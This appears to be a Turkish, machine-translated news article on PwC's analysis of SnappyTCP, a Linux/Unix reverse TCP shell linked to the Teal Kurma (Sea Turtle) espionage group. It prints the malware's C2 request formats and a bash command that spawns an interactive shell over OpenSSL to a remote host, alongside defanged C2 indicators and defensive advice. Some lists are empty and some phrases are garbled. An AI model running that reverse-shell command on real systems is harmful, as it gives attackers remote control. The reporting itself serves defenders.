Bilgisayar korsanları, yetkisiz uzaktan erişim elde etmek için Linux veya Unix sistemlerindeki ters TCP kabuklarından yararlanır. Bu, kimliklerini ve konumlarını maskelerken güvenlik açıklarından yararlanarak aşağıdaki yasa dışı faaliyetleri yapmalarına olanak tanır: –
- Komutları yürüt
- Verileri sızdır
- Sistemin güvenliğini tehlikeye atın
PwC’deki siber güvenlik araştırmacıları yakın zamanda Teal Kurma’nın (diğer adıyla Deniz Kaplumbağası, Mermer Toz, Kozmik Kurt) ‘SnappyTCP’ adlı kötü amaçlı yazılımlarından birini analiz ederken Linux veya Unix sistemleri için C2 özelliklerine sahip bir ters TCP kabuğu keşfetti.
Bunun yanı sıra, Teal Kurma’nın üç yılı ilk olarak üç yıl önce takip edildi ve öncelikle aşağıdaki hedeflere odaklanıyor: –
SnappyTCP: Ters TCP Kabuğu
Teal Kurma 2017’den bu yana güvenlik açıklarından, özellikle de aşağıdaki gibi CVE’lerden yararlanıyor:
Erişim sağladıktan sonra “upxa.sh” çalıştırıyorlar ve bıraktıkları bir yürütülebilir dosya yardımıyla kontrolleri altındaki bir sunucuyla iletişim kuruyorlar.
Temel C2 yetenekleri ve kalıcılık işlevleriyle Webshell, bir Linux/Unix ters TCP kabuğudur. Bunun yanı sıra iki varyant mevcuttur ve aşağıdakileri yaparlar: –
- Bir varyant, TLS üzerinden OpenSSL ile bağlantıları güvence altına alır.
- Başka bir varyant ise açık metin istekleri gönderir.
TLS olmayan kötü amaçlı yazılım “conf” dosyasını okur, ilk 256 bayttan IP’yi çıkarır ve şu komutla TCP soketi aracılığıyla bağlanır:-
- GET /sy.php HTTP/1.1\r\nAna Bilgisayar: %s\r\nAna Bilgisayar Adı: %s\r\n\r\n”, ana bilgisayar_adı, ana bilgisayar_adı
sy.php hxxp://lo0 adresinde barındırılıyor[.]sistemctl[.]network/sy.php Temmuz 2021’den bu yana, 2022 Yunanistan CERT uyarısıyla bağlantılı ve sürekli kullanımı öneriyor. 2023’teki güncel altyapı, CERT uyarı göstergeleri aracılığıyla SnappyTCP’ye bağlandı.
Kötü amaçlı yazılım, HTTP isteğinde “X-Auth-43245-S-20” ve “\r\n\r\n” için tarama yapar ve ardından TCP ters kabuğunu tetikler. Güvenli bir bağlantı için OpenSSL ve TLS sertifikalarını kullanan kötü amaçlı yazılım, diğer durumlarda conf dosyasındaki bir IP’ye bağlanır ve ardından şunları gönderir: –
- GET /ssl.php HTTP/1.1\\r\\nAna Bilgisayar: %s\\r\\nAna Bilgisayar Adı: %s\\r\\nBağlantı: kapat\\r\\n\\r\\n
Geçmişteki örneklere benzer şekilde, ‘kdd_launch’ değil, ‘update’ adlı farklı bir dosyayı yürütmek için bash’ı çağıran bir pthread üretir: –
- bash -c \\”./update exec:’bash -li’,pty,stderr,setsid,sigint,sane OPENSSL:%s:%d,verify=0 2>&1>/dev/null&\\”
SnappyTCP ikili dosyaları çeşitli araç zincirleri kullanır (Tablo 1). GLIBC statik olarak bağlantılıdır ve hedef makinenin kitaplık dosyalarına bağlanmadan bağımsız çalışmaya olanak tanır.
Bununla birlikte, bunun yanı sıra yürütme yöntemleri de farklılık gösterir ve bu da ya paylaşılan bir nesne dosyasına ya da yürütülebilir bir dosyaya neden olur.
ELF dosyalarında derleme tarihleri yoktur, çünkü bu, araç zinciri kullanımındaki kötü amaçlı yazılım evrimiyle bağlantılı varyasyonların gizlenmesine yardımcı olur. Çoklu geliştiriciler veya farklı mimariler için çapraz derleme, araç zinciri çeşitliliğini açıklayabilir.
GitHub deposu, Teal Kurma’nın genel kodu yansıtan ters TCP kabuğunu ortaya koyuyor; ‘bağlayıcı’nın yerine ‘güncelleme’ geliyor. Depodaki diğer örnekler, muhtemelen Teal Kurma’nın faaliyetleriyle bağlantılı ters kabuklar oluşturuyor.
Analiz edilen örnekler SnappyTCP GET isteklerine dayanıyordu ve Teal Kurma altyapı avı için Deniz Kaplumbağası raporlamasını (örneğin, 2022 Yunan CERT uyarısı) kullandı. hxxp://108.61.103 gibi şüpheli alanlar belirlendi[.]186/sy.php ve ybcd[.]teknoloji. CERT altyapısını araştırdı ve aktif bağlantılar buldu: –
- 168.100.10[.]187
- 93.115.22[.]212
Casusluk için ters kabuğu kullanan Orta Doğu’yu hedef alan Medya ve STK sektörlerine bağlı ortaya çıkarılan TLS sertifikaları. Mağduriyet bilimi, hassas veriler için aşağıdaki varlıklara odaklanılmasını önerir: –
- Hükümetler
- Telekom
- BT sağlayıcıları
Telekom müşteri meta verilerini elinde tutuyor ve teknoloji şirketleri adadan atlayan saldırılara karşı savunmasız. Tehdit aktörleri gözetimi veya geleneksel istihbaratı hedeflerken, STK’lar ve medya sektörleri de hedefleniyor.
TLS sertifikaları Orta Doğu ve Kuzey Afrika odağını gösterir; SnappyTCP muhtemelen Avrupa ülkelerinde mevcuttur. Ayrıntıların hedeflenmesi, ilişkilendirmeye yardımcı olur ve benzer bölge veya sektörlerdeki kuruluşlar için öngörüler sağlar.
Öneriler
Aşağıda, güvenlik araştırmacıları tarafından sağlanan tüm önerilerden bahsettik: –
- Günlükleri kontrol ettiğinizden emin olun
- Blog göstergeleri için uyarıları ayarlama
- Eğer bulunursa, kökenlerini araştırdığınızdan emin olun.
- Bulunursa adli analiz yapın
- Önemli bir bulgu yoksa kötü amaçlı göstergeleri engelleyin.